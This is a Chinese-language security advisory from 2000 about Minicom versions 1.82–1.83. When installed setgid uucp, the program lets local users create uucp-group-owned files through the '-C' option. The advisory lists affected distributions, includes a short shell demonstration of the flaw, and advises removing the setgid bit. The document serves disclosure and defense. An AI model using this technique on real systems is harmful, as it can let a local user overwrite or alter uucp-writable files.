发布日期：2000-08-23
更新日期：2000-08-23

受影响系统：

Jukka Lahtinen Minicom 1.83.1
Jukka Lahtinen Minicom 1.83.0
   + RedHat Linux 6.2
   + RedHat Linux 6.1
Jukka Lahtinen Minicom 1.82.1
Jukka Lahtinen Minicom 1.82.0
   + Slackware Linux 7.0
   - SuSE 6.4
   -

不受影响系统：

- Mandrake Linux 7.1
- Conectiva Linux

描述：

---

Minicom是一个用来在使用modem的计算机之间进行通讯的Unix终端程序。在很多系统中，它
缺省安装了setgid uucp属性。通过使用"-C"参数指定一个通讯记录文件，普通用户可以创建
一个被uucp组所拥有的文件。在使用uucp的系统中，这可能导致一些安全问题，例如某些uucp
组可写的文件被覆盖或者修改。

<*来源： Michal Zalewski (lcamtuf@tpi.pl） *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

[lcamtuf@nimue lcamtuf]$ minicom -C foo
minicom: there is no global configuration file /etc/minirc.dfl
Ask your sysadm to create one (with minicom -s).

[lcamtuf@nimue lcamtuf]$ ls -l foo
-rw-rw-r--   1 lcamtuf  uucp            0 Aug 18 12:21 foo
     ^^                  ^^^^



建议：

---

临时解决办法：
去掉minicom的setgid uucp属性。

浏览次数：6388
严重程度：0（网友投票）